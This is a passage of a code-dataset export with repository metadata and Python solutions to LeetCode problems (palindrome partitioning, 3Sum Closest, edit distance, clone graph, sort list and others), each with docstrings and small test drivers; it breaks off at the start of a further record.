"text": "class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n ''' Given a string s, partition s such that every substring of the partition is a palindrome.\n\nReturn all possible palindrome partitioning of s.\n\nFor example, given s = \"aab\",\nReturn\n\n [\n [\"aa\",\"b\"],\n [\"a\",\"a\",\"b\"]\n ]\n'''\n n = len(s)\n is_palindrome = [[False] * n for row in range(n)]\n for pos in range(0, n):\n l = 0\n while pos - l >= 0 and pos + l <= n - 1 and s[pos - l] == s[pos + l]:\n is_palindrome[pos - l][pos + l] = True\n l += 1\n l = 0\n while pos - l - 1 >= 0 and pos + l <= n - 1 and s[pos - l - 1] == s[pos + l]:\n is_palindrome[pos - l - 1][pos + l] = True\n l += 1\n cuts = list(range(n + 1))\n cuts[n] = []\n for i in range(n - 1, -1, -1):\n cuts[i] = []\n for j in range(i, n):\n if is_palindrome[i][j]:\n cuts[i].append(j + 1)\n reslist = []\n self.dfs(s, reslist, cuts, [], 0, n)\n return reslist\n\n def dfs(self, s, reslist, cuts, curres, pos, n):\n if pos == n:\n reslist.append(list(curres))\n return\n for nextpos in cuts[pos]:\n curres.append(s[pos:nextpos])\n self.dfs(s, reslist, cuts, curres, nextpos, n)\n curres.pop()\n\ns = ''\nprint(len(s))\nprint(s)\nprint(Solution.partition(Solution(), s))"
},
{
"alpha_fraction": 0.45856353640556335,
"alphanum_fraction": 0.48895028233528137,
"avg_line_length": 30.97058868408203,
"blob_id": "a43021e2377f8f210c4d6d4c2cf29ed3e883bea6",
"content_id": "b1c82faadda0e7dd83c108ac435657742c67a26c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1086,
"license_type": "no_license",
"max_line_length": 222,
"num_lines": 34,
"path": "/3Sum Closest.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def threeSumClosest(self, num, target):\n '''\n Given an array S of n integers, find three integers in S such that the sum is closest to a given number, target. Return the sum of the three integers. You may assume that each input would have exactly one solution.\n\n For example, given array S = {-1 2 1 -4}, and target = 1.\n\n The sum that is closest to the target is 2. (-1 + 2 + 1 = 2).\n\n '''\n if len(num) < 3:\n return target\n num.sort()\n res = num[0] + num[1] + num[2]\n for i in range(len(num) - 2):\n j = i + 1\n k = len(num) - 1\n while j < k:\n x = num[i] + num[j] + num[k]\n if abs(target - x) < abs(target - res):\n res = x\n if x < target:\n j += 1\n else:\n k -= 1\n return res\n\nnum1 = [-1, 0, 1, 2, -1, -4]\nnum2 = [-1, 2, 1, -4]\nnum = num2\nprint(len(num), num)\nres = Solution.threeSumClosest(Solution(), num, 1)\nprint(res)"
},
{
"alpha_fraction": 0.4935683608055115,
"alphanum_fraction": 0.5021438598632812,
"avg_line_length": 26.259740829467773,
"blob_id": "10bc06ef7738bd62fc2a3cc65249b2d93d046620",
"content_id": "c99cc2d556a48b6002bedffd117d50e70434586f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 77,
"path": "/Binary Tree Inorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n '''Given a binary tree, return the inorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [1,3,2].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n def inorderTraversal(self, root):\n return self.inorderTraversal_Morris(root)\n\n def __init__(self):\n self.l = []\n\n # @param root, a tree node\n # @return a list of integers\n def inorderTraversal_Recursive(self, root):\n if root is None:\n return []\n self.inorderTraversal(root.left)\n self.l.append(root.val)\n self.inorderTraversal(root.right)\n return self.l\n\n def inorderTraversal_Stack(self, root):\n if root is None:\n return []\n stack = [[root, 0]]\n l = []\n while len(stack) > 0:\n node, state = stack.pop()\n if state == 1:\n l.append(node.val)\n continue\n if node.right:\n stack.append([node.right, 0])\n stack.append([node, 1])\n if node.left:\n stack.append([node.left, 0])\n return l\n\n def inorderTraversal_Morris(self, root):\n if root is None:\n return []\n l = []\n cur = root\n while cur:\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if not rightmost.right:\n rightmost.right = cur\n cur = cur.left\n else:\n l.append(cur.val)\n cur = cur.right\n rightmost.right = None\n else:\n l.append(cur.val)\n cur = cur.right\n return l\n"
},
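The three variants above should agree; here is a sketch on the {1,#,2,3} tree from the docstring, assuming the Solution class is in scope (the Morris version removes the threads it creates, so it leaves the tree unmodified):

```python
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(1)
root.right = TreeNode(2)
root.right.left = TreeNode(3)

ss = Solution()
print(ss.inorderTraversal_Stack(root))   # expected: [1, 3, 2]
print(ss.inorderTraversal_Morris(root))  # expected: [1, 3, 2]
```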
{
"alpha_fraction": 0.4318321943283081,
"alphanum_fraction": 0.4466378688812256,
"avg_line_length": 27.928571701049805,
"blob_id": "bbe0de93b67054db48ab04abb1ee6a20f4679330",
"content_id": "516ed04a7dce229dc9ce7d978642539864bc67b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 56,
"path": "/Minimum Window Substring.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def minWindow(self, S, T):\n '''\n Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).\n\nFor example,\nS = \"ADOBECODEBANC\"\nT = \"ABC\"\n\nMinimum window is \"BANC\".\n\nNote:\nIf there is no such window in S that covers all characters in T, return the emtpy string \"\".\n\nIf there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S. \n '''\n if T == '':\n return ''\n countT = {}\n for c in T:\n if c not in countT:\n countT[c] = 0\n countT[c] += 1\n n = len(countT)\n countLR = {}\n for c in countT:\n countLR[c] = 0\n l, r = 0, 0\n min_count = len(S) + 1\n min_window = ''\n while True:\n while n > 0 and r < len(S):\n if S[r] in countLR:\n countLR[S[r]] += 1\n if countLR[S[r]] == countT[S[r]]:\n n -= 1\n r += 1\n if n != 0:\n break\n while n == 0:\n if S[l] in countLR:\n countLR[S[l]] -= 1\n if countLR[S[l]] == countT[S[l]] - 1:\n n += 1\n l += 1\n if r - l + 1 < min_count:\n min_window = S[l - 1:r]\n min_count = r - l + 1\n return min_window\n\ns1 = [\"ADOBECODEBANC\", \"ABC\"]\ns2 = ['aa', 'aa']\ns = s2\nprint(s)\nprint(Solution.minWindow(Solution(), s[0], s[1]))\n\n"
},
{
"alpha_fraction": 0.4005201458930969,
"alphanum_fraction": 0.4109232723712921,
"avg_line_length": 32.434783935546875,
"blob_id": "d77fb432035507986c88c32190ab5e9a81bc3f89",
"content_id": "8a02778f646624ffdf452694847762d2d1987f64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 23,
"path": "/Valid Parentheses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isValid(self, s):\n '''\n Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n\nThe brackets must close in the correct order, \"()\" and \"()[]{}\" are all valid but \"(]\" and \"([)]\" are not.\n '''\n ldic = {'(': 1, '[': 2, '{': 4}\n rdic = {')': -1, ']': -2, '}': -4}\n stack = []\n for c in s:\n if c in ldic:\n stack.append(ldic[c])\n else:\n if len(stack) == 0:\n return False\n x = stack.pop()\n if x != -rdic[c]:\n return False\n if len(stack) > 0:\n return False\n return True\n"
},
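Spot checks from the problem statement for isValid above, assuming the Solution class is in scope:

```python
ss = Solution()
for s in ("()", "()[]{}", "(]", "([)]"):
    print(s, ss.isValid(s))
# expected: True, True, False, False
```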
{
"alpha_fraction": 0.5192096829414368,
"alphanum_fraction": 0.537870466709137,
"avg_line_length": 30.44827651977539,
"blob_id": "ead3278e1e4106c68468dc6e91b2f1bcf71de5a4",
"content_id": "1e34464c86ecc3be91450fdb334bf709a2341d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 29,
"path": "/Word Break.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a boolean\n def wordBreak(self, s, dict):\n ''' Given a string s and a dictionary of words dict, determine if s can be segmented into a space-separated sequence of one or more dictionary words.\n\nFor example, given\ns = \"leetcode\",\ndict = [\"leet\", \"code\"].\n\nReturn true because \"leetcode\" can be segmented as \"leet code\". '''\n mlen = 0\n for word in dict:\n mlen = max(len(word), mlen)\n slen = len(s)\n dp = list(range(slen + 1))\n dp[slen] = True\n for i in range(slen - 1, -1, -1):\n dp[i] = False\n for j in range(i, min(i + mlen, slen)):\n dp[i] = dp[i] or (s[i:j + 1] in dict and dp[j + 1])\n return dp[0]\n\nA = ['1', '2', '3', '3', '2', '1', '4', '5', '4']\na = 'abcdefg'\nso = Solution()\nres = so.wordBreak(a, A)\nprint(res)"
},
{
"alpha_fraction": 0.4450101852416992,
"alphanum_fraction": 0.4887983798980713,
"avg_line_length": 31.766666412353516,
"blob_id": "4393a4f75bf2124e67d6ec95b7680a4228b65547",
"content_id": "9b5250e59708518504e008c531f37914a71930be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 30,
"path": "/Edit Distance.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def minDistance(self, word1, word2):\n '''\n Given two words word1 and word2, find the minimum number of steps required to convert word1 to word2. (each operation is counted as 1 step.)\n\nYou have the following 3 operations permitted on a word:\n\na) Insert a character\nb) Delete a character\nc) Replace a character\n '''\n n1 = len(word1)\n n2 = len(word2)\n dp = [[0] * (n2 + 1) for row in range(n1 + 1)]\n for i in range(0, n1 + 1):\n for j in range(0, n2 + 1):\n dp[i][j] = max(i, j)\n if i == 0 or j == 0:\n continue\n dp[i][j] = dp[i - 1][j - 1] + 1\n if word1[i - 1] == word2[j - 1]:\n dp[i][j] -= 1\n dp[i][j] = min(dp[i][j], dp[i - 1][j] + 1, dp[i][j - 1] + 1)\n return dp[n1][n2]\n\ns1 = ['ab', 'bc']\ns = s1\nprint(s)\nprint(Solution.minDistance(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.4578096866607666,
"alphanum_fraction": 0.4901256859302521,
"avg_line_length": 24.31818199157715,
"blob_id": "ce060a9e446961317f08a8972c767d6d83a963c8",
"content_id": "e722f7dc7c87c92841ae9aa4cefcfc53fe0c2f39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 22,
"path": "/Find Minimum in Rotated Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def findMin(self, num):\n '''\n Suppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nFind the minimum element.\n\nYou may assume no duplicate exists in the array.\n '''\n l = 0\n r = len(num) - 1\n while l < r:\n mid = (l + r) // 2\n if num[mid] < num[r]:\n r = mid\n else:\n l = mid + 1\n return num[l]\n"
},
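The search above compares the midpoint against the right endpoint, which works whether or not the array is actually rotated; a sketch assuming the Solution class above:

```python
ss = Solution()
print(ss.findMin([4, 5, 6, 7, 0, 1, 2]))  # expected: 0
print(ss.findMin([1, 2, 3]))              # expected: 1 (pivot at index 0)
```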
{
"alpha_fraction": 0.5348297357559204,
"alphanum_fraction": 0.5603715181350708,
"avg_line_length": 32.153846740722656,
"blob_id": "e68da907ce4c90fa6d3e33362a9c0e9fc861482b",
"content_id": "2859858331654d341f41417a8c20026fde4ea2dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1292,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 39,
"path": "/Gas Station.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param gas, a list of integers\n # @param cost, a list of integers\n # @return an integer\n def canCompleteCircuit(self, gas, cost):\n ''' There are N gas stations along a circular route, where the amount of gas at station i is gas[i].\n\nYou have a car with an unlimited gas tank and it costs cost[i] of gas to travel from station i to its next station (i+1). You begin the journey with an empty tank at one of the gas stations.\n\nReturn the starting gas station's index if you can travel around the circuit once, otherwise return -1.\n\nNote:\nThe solution is guaranteed to be unique. '''\n n = len(gas)\n start = 0\n cur = 0\n curlen = 0\n startcount = 1\n remain = 0\n while curlen < n and startcount <= n:\n remain += gas[cur] - cost[cur]\n while remain < 0:\n remain -= gas[start] - cost[start]\n start = (start + 1) % n\n startcount += 1\n curlen -= 1\n cur = (cur + 1) % n\n curlen += 1\n if cur == start and startcount <= n:\n return start\n else:\n return -1\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4]\nA1 = [1, 2, 3]\nA2 = [2, 1, 4]\nso = Solution()\nres = so.canCompleteCircuit(A1, A2)\nprint(res)"
},
{
"alpha_fraction": 0.4172307550907135,
"alphanum_fraction": 0.44738462567329407,
"avg_line_length": 34.34782791137695,
"blob_id": "8a2d336b52f707161a4fd3f4d82c469a95ddf1bd",
"content_id": "09e70011914ee919032211dbd8cd6089815ff4d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1631,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 46,
"path": "/4Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of length 4, [[val1,val2,val3,val4]]\n def fourSum(self, num, target):\n '''\n Given an array S of n integers, are there elements a, b, c, and d in S such that a + b + c + d = target? Find all unique quadruplets in the array which gives the sum of target.\n\nNote:\n\n Elements in a quadruplet (a,b,c,d) must be in non-descending order. (ie, a ≤ b ≤ c ≤ d)\n The solution set must not contain duplicate quadruplets.\n\n For example, given array S = {1 0 -1 0 -2 2}, and target = 0.\n\n A solution set is:\n (-1, 0, 0, 1)\n (-2, -1, 1, 2)\n (-2, 0, 0, 2)\n '''\n n = len(num)\n num.sort()\n twoSumDic = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n x = num[i] + num[j]\n if x not in twoSumDic:\n twoSumDic[x] = []\n twoSumDic[x].append([num[i], num[j], i, j])\n resSet = set()\n for i in range(n - 1):\n for j in range(i + 1, n):\n x = target - (num[i] + num[j])\n if x in twoSumDic:\n for y in twoSumDic[x]:\n if y[3] == i or y[3] == j or y[2] == i or y[2] == j:\n continue\n a = [num[i], num[j], y[0], y[1]]\n a.sort()\n resSet.add((a[0], a[1], a[2], a[3]))\n res = []\n for a in resSet:\n res.append([a[i] for i in range(len(a))])\n return res\n\ns0 = [0, [1, 0, -1, 0, -2, 2]]\ns = s0\nprint(Solution.fourSum(Solution(), s[1], s[0]))"
},
{
"alpha_fraction": 0.5578842163085938,
"alphanum_fraction": 0.5858283638954163,
"avg_line_length": 26.86111068725586,
"blob_id": "011ad926dc8d1731773380e2828f45af4d97bdc4",
"content_id": "0ed41358ca52676d774697bd9576b55fe2f3290d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 36,
"path": "/Palindrome Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isPalindrome(self, x):\n '''\n Determine whether an integer is a palindrome. Do this without extra space.\n\nclick to show spoilers.\nSome hints:\n\nCould negative integers be palindromes? (ie, -1)\n\nIf you are thinking of converting the integer to string, note the restriction of using extra space.\n\nYou could also try reversing an integer. However, if you have solved the problem \"Reverse Integer\", you know that the reversed integer might overflow. How would you handle such case?\n\nThere is a more generic way of solving this problem.\n\n '''\n t = x\n if x < 0:\n return False\n l = 0\n while t > 0:\n t //= 10\n l += 1\n for i in range(l // 2):\n a = (x // pow(10, i)) % 10\n b = (x // pow(10, l - i - 1)) % 10\n if a != b:\n return False\n return True\n\ns0 = 120030221\ns = s0\nprint(s)\nprint(Solution.isPalindrome(Solution(), s))"
},
{
"alpha_fraction": 0.4273437559604645,
"alphanum_fraction": 0.46015626192092896,
"avg_line_length": 24.117647171020508,
"blob_id": "389f41c01ac9e4b2b0cef772fd555665c841f221",
"content_id": "bb47fe82f7fa421a5bb63467f171b90c10335618",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 51,
"path": "/Spiral Matrix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @return a list of integers\n def spiralOrder(self, matrix):\n '''\n Given a matrix of m x n elements (m rows, n columns), return all elements of the matrix in spiral order.\n\nFor example,\nGiven the following matrix:\n\n[\n [ 1, 2, 3 ],\n [ 4, 5, 6 ],\n [ 7, 8, 9 ]\n]\n\nYou should return [1,2,3,6,9,8,7,4,5]. \n '''\n if len(matrix) == 0:\n return []\n res = []\n l, r = 0, len(matrix[0]) - 1\n up, down = 0, len(matrix) - 1\n while l <= r and up <= down:\n for i in range(l, r):\n res.append(matrix[up][i])\n for i in range(up, down + 1):\n res.append(matrix[i][r])\n if l == r or up == down:\n break\n for i in range(r - 1, l, -1):\n res.append(matrix[down][i])\n for i in range(down, up, -1):\n res.append(matrix[i][l])\n l += 1\n r -= 1\n up += 1\n down -= 1\n return res\n\nn = 4\nm = []\nfor i in range(n):\n m.append([i * n + j + 1 for j in range(n)])\nm1 = [[6,9,7]]\nm2 = [[6], [9], [7]]\nm = m\nfor i in range(len(m)):\n print(m[i])\nres = Solution.spiralOrder(Solution(), m)\nprint(res)"
},
{
"alpha_fraction": 0.3913043439388275,
"alphanum_fraction": 0.4220389723777771,
"avg_line_length": 28.66666603088379,
"blob_id": "e3c2a026c1f457a29bbbda24030d53d2c6015a51",
"content_id": "0c94af1fac0404c5c4934dfdb9033865a2865924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/Evaluate Reverse Polish Notation.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param tokens, a list of string\n # @return an integer\n def evalRPN(self, tokens):\n \"\"\" Evaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, /. Each operand may be an integer or another expression.\n\nSome examples:\n\n [\"2\", \"1\", \"+\", \"3\", \"*\"] -> ((2 + 1) * 3) -> 9\n [\"4\", \"13\", \"5\", \"/\", \"+\"] -> (4 + (13 / 5)) -> 6\n\"\"\"\n tab = \"+-*/\"\n stack = []\n for token in tokens:\n if tab.find(token) == -1:\n stack.append(int(token))\n else:\n b = stack.pop()\n a = stack.pop()\n op = token\n c = self.myEval(a, b, op)\n #print(c, \"=\", a, op, b)\n #stack.append(eval('%d%s%d' % (stack.pop(), token, tmp)))\n stack.append(c)\n return stack[0]\n\n def myEval(self, a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n return int(a * 1.0 / b)\n\ntokens1 = [\"2\", \"1\", \"+\", \"3\", \"*\"]\ntokens2 = [\"4\", \"13\", \"5\", \"/\", \"+\"]\ntokens3 = [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\ntokenss = tokens3\nprint(tokenss)\nss = Solution()\nprint(ss.evalRPN(tokenss))"
},
{
"alpha_fraction": 0.5593789219856262,
"alphanum_fraction": 0.5749055743217468,
"avg_line_length": 28.799999237060547,
"blob_id": "6f8b4951e2a9d841adc5b86a92f85fff9724f65e",
"content_id": "751fc7711da12e6717f968b43c25802079a27436",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 80,
"path": "/Clone Graph.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n def cloneGraph(self, node):\n ''' Clone an undirected graph. Each node in the graph contains a label and a list of its neighbors.\n\nOJ's undirected graph serialization:\n\nNodes are labeled uniquely.\nWe use # as a separator for each node, and , as a separator for node label and each neighbor of the node.\n\nAs an example, consider the serialized graph {0,1,2#1,2#2,2}.\n\nThe graph has a total of three nodes, and therefore contains three parts as separated by #.\n\n First node is labeled as 0. Connect node 0 to both nodes 1 and 2.\n Second node is labeled as 1. Connect node 1 to node 2.\n Third node is labeled as 2. Connect node 2 to node 2 (itself), thus forming a self-cycle.\n\nVisually, the graph looks like the following:\n\n 1\n / \\\n / \\\n 0 --- 2\n / \\\n \\_/\n'''\n if node is None:\n return None\n dict = {}\n queue = []\n preq = []\n queue.append(node)\n while len(queue) > 0:\n cur = queue.pop(0)\n if cur.label in preq:\n continue\n preq.append(cur.label)\n if cur.label not in dict:\n dict[cur.label] = UndirectedGraphNode(cur.label)\n copyNode = dict[cur.label]\n for tn in cur.neighbors:\n if tn.label not in dict:\n dict[tn.label] = UndirectedGraphNode(tn.label)\n copyNode.neighbors.append(dict[tn.label])\n if tn.label not in preq:\n queue.append(tn)\n return dict[node.label]\n\nclass UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\n def __str__(self):\n res = str(self.label) + \":\"\n for n in self.neighbors:\n res += \" \" + str(n.label)\n res += \"# \"\n for n in self.neighbors:\n if self.label != n.label:\n res += str(n)\n return res\n\nN2 = UndirectedGraphNode(2)\nN2.neighbors = [N2]\nN1 = UndirectedGraphNode(1)\nN1.neighbors = [N2]\nN0 = UndirectedGraphNode(0)\nN0.neighbors = [N1, N2]\nso = Solution()\n#print(N0)\nprint(so.cloneGraph(N0))"
},
{
"alpha_fraction": 0.4561886191368103,
"alphanum_fraction": 0.46090373396873474,
"avg_line_length": 24.717172622680664,
"blob_id": "eb2f653af97cdc67539bed13618079856081bffe",
"content_id": "035d7430c021ec89785457f743d2b9a1221db7bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2545,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 99,
"path": "/Sort List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n \"\"\"Sort a linked list in O(n log n) time using constant space complexity.\"\"\"\n #print(head)\n return self.mergeList(head)\n\n def mergeList(self, node):\n #print('merge start', node)\n snode = node\n size = 0\n lh = None\n rh = None\n while node is not None:\n size += 1\n tmp = node\n node = node.next\n if size % 2:\n tmp.next = lh\n lh = tmp\n else:\n tmp.next = rh\n rh = tmp\n #print('size = ', size)\n #print(\"return: \" + str(snode))\n if size <= 1:\n return snode\n #print(\"lh : \" + str(lh))\n #print(\"rh : \" + str(rh))\n\n lres = self.mergeList(lh)\n rres = self.mergeList(rh)\n #print(\"lres : \" + str(lres))\n #print(\"rres : \" + str(rres))\n res = self.mergeSortedList(lres, rres)\n #print('merge end', res)\n return res\n\n def mergeSortedList(self, lh, rh):\n tlh = lh\n #print('sorted list start')\n while rh is not None:\n if lh.val > rh.val:\n tmpnode = rh\n rh = rh.next\n tmpnode.next = lh\n lh = tmpnode\n tlh = lh\n continue\n while lh.next is not None and lh.next.val < rh.val:\n lh = lh.next\n if lh.next is None and lh.val < rh.val:\n lh.next = rh\n break\n tmpnode = rh\n rh = rh.next\n tmpnode.next = lh.next\n lh.next = tmpnode\n #print('sorted list end')\n return tlh\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n #print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\nin0 = [1, 2, 4, 3, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n #print(head)\n print(ss.sortList(head.next))\n print()"
},
{
"alpha_fraction": 0.312992125749588,
"alphanum_fraction": 0.375984251499176,
"avg_line_length": 18.576923370361328,
"blob_id": "dffa6812ad8276b04202de2e353f12f09d92dd21",
"content_id": "d48e4926096dbba727178b38e94d8f1749f7f878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 26,
"path": "/Pow(x, n).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param x, a float\n # @param n, a integer\n # @return a float\n def pow(self, x, n):\n '''\n Implement pow(x, n). \n '''\n if n < 0:\n x = 1 / x\n n *= -1\n ex = 1\n base = x\n while n > 0:\n if n % 2 == 1:\n ex *= base\n n //= 2\n base *= base\n return ex\n\ns2 = [8.88023, 3]\ns1 = [2, 31]\ns3 = [34.00515, -3]\ns = s3\nprint(s)\nprint(Solution.pow(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.5159010887145996,
"alphanum_fraction": 0.5279151797294617,
"avg_line_length": 22.58333396911621,
"blob_id": "42f06943e58b2399d43f9e10f9f6ba1993aae8e3",
"content_id": "adf734517014b506ebc28d105f40ad5140d34e30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1415,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 60,
"path": "/Convert Sorted List to Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a list node\n # @return a tree node\n def sortedListToBST(self, head):\n '''Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.'''\n n = 0\n t = head\n while t:\n n += 1\n t = t.next\n return self.dfs([head], 0, n - 1)\n\n def dfs(self, t, l, r):\n if r < l:\n return None\n mid = (l + r) // 2\n lchild = self.dfs(t, l, mid - 1)\n parent = TreeNode(t[0].val)\n t[0] = t[0].next\n #print(l, r, mid, parent.val)\n parent.left = lchild\n parent.right = self.dfs(t, mid + 1, r)\n return parent\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\na = ListNode(3)\nb = ListNode(5)\nc = ListNode(8)\nd = ListNode(10)\ne = ListNode(13)\na.next = b\nb.next = c\nc.next = d\nd.next = e\ns = Solution()\nr = s.sortedListToBST(a)\n"
},
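The record builds a balanced BST from the list in O(n); the sketch below shows the same middle-element-as-root recursion on a plain array, which is easier to follow (class and function names are mine, not the file's).

class Node:
    def __init__(self, val):
        self.val, self.left, self.right = val, None, None

def sorted_values_to_bst(vals, lo=0, hi=None):
    """Pick the middle element as the root of each subtree."""
    if hi is None:
        hi = len(vals) - 1
    if lo > hi:
        return None
    mid = (lo + hi) // 2
    root = Node(vals[mid])
    root.left = sorted_values_to_bst(vals, lo, mid - 1)
    root.right = sorted_values_to_bst(vals, mid + 1, hi)
    return root

root = sorted_values_to_bst([3, 5, 8, 10, 13])   # same values as the file's test
assert root.val == 8 and root.left.val == 3 and root.right.val == 10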
{
"alpha_fraction": 0.41126760840415955,
"alphanum_fraction": 0.4309859275817871,
"avg_line_length": 25,
"blob_id": "fa97dba5c4d7319963f2d452de7484503cbfd097",
"content_id": "575ac14a84d020934a0e8665a50cd98b9efc13a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1065,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/Implement strStr().py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
